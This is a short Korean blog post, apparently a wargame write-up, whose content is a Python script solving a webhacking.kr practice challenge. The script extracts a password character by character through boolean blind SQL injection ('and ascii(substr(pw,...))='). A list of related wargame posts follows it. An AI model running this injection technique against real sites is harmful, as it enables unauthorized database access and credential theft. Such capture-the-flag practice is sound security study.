import http.client import urllib import time def _try(no): c = http.client.HTTPConnection('webhacking.kr',80) head={'Cookie':'PHPSESSID=xxx'} head['Host']='webhacking.kr' head['Upgrade-Insecure-Requests']='1' c.request('GET','/challenge/bonus/bonus-1/index.php?no='+urllib.parse.quote(no),headers=head) res=c.getresponse().read().decode() return 'True' in res arr='1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKlMNOPQRSTUVWXYZ' q1='2 and ascii(substr(pw,' q2='))=' pw='' for i in range(19): print(i) for j in arr: print(q1+str(i+1)+','+str(i+1)+q2+str(ord(j))) if(_try(q1+str(i+1)+','+str(i+1)+q2+str(ord(j)))): pw+=j print("find") break print(pw)
'war game > webhacking.kr' 카테고리의 다른 글
| [webhacking.kr]55번 left right을 이용한 blind sql (0) | 2017.01.31 |
|---|---|
| [webhacking.kr]22번 blind sql injection binary search (0) | 2017.01.30 |
| [webhacking.kr] 6번 100pt (0) | 2017.01.18 |
| [webhacking.kr]23번 200pt (0) | 2017.01.18 |
| [webhacking.kr] 25 150pt (0) | 2017.01.10 |